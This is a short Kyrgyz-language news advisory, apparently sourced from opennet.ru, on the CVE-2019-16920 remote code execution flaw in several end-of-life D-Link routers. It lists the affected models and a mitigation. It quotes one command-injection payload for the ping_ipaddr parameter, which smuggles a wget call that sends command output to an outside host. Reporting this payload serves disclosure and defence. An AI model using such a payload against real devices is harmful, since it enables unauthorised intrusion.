D-Link роутерлеринде алыстан колдонулуучу аялуу

D-Link зымсыз роутерлеринде аныкталган коркунучтуу аялуу (CVE-2019–16920), бул сизге аутентификациясыз жеткиликтүү болгон “ping_test” иштеткичине атайын суроо-талапты жөнөтүү аркылуу түзмөк тарабында кодду алыстан аткарууга мүмкүндүк берет.

Кызыгы, микропрограмманы иштеп чыгуучулардын айтымында, “ping_test” чалуу аутентификациядан кийин гана аткарылышы керек, бирок чындыгында ал веб-интерфейске киргенине карабастан, кандай гана учурда болбосун чакырылат. Тактап айтканда, apply_sec.cgi скриптине кирүүдө жана “action=ping_test” параметрин өткөрүп жатканда, скрипт аутентификация барагына багыттайт, бирок ошол эле учурда ping_test менен байланышкан аракетти аткарат. Кодду ишке ашыруу үчүн ping_testтин өзүндө дагы бир кемчилик колдонулган, ал тестирлөө үчүн жөнөтүлгөн IP даректин тууралыгын туура текшербестен ping утилитасын чакырат. Мисалы, wget утилитасын чакырып, "echo 1234" буйругунун натыйжаларын тышкы хостко өткөрүү үчүн "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" параметрин көрсөтүңүз. test.test/?$( echo 1234)".

D-Link роутерлеринде алыстан колдонулуучу аялуу

Алсыздыктын болушу төмөнкү моделдерде расмий түрдө тастыкталган:

  • DIR-655 микропрограммасы 3.02b05 же андан жогору;
  • DIR-866L микропрограммасы 1.03b04 же андан жогору;
  • DIR-1565 микропрограммасы 1.01 же андан жогору;
  • DIR-652 (проблемалуу микропрограмма версиялары жөнүндө маалымат берилген эмес)

Бул моделдерди колдоо мөөнөтү бүтүп калды, ошондуктан D-Link Ал, алсыздыкты жоюу үчүн жаңыртууларды чыгарбайт, аларды колдонууну сунуштабайт жана аларды жаңы түзмөктөр менен алмаштырууну сунуштайт. Коопсуздукту чечүү жолу катары, веб-интерфейске кирүүнү ишенимдүү IP даректерге гана чектей аласыз.

Кийинчерээк алсыздык да бар экени аныкталган таасир этет моделдери DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 жана DIR-825, жаңыртууларды чыгаруу пландары азырынча белгисиз.

Source: opennet.ru

Комментарий кошуу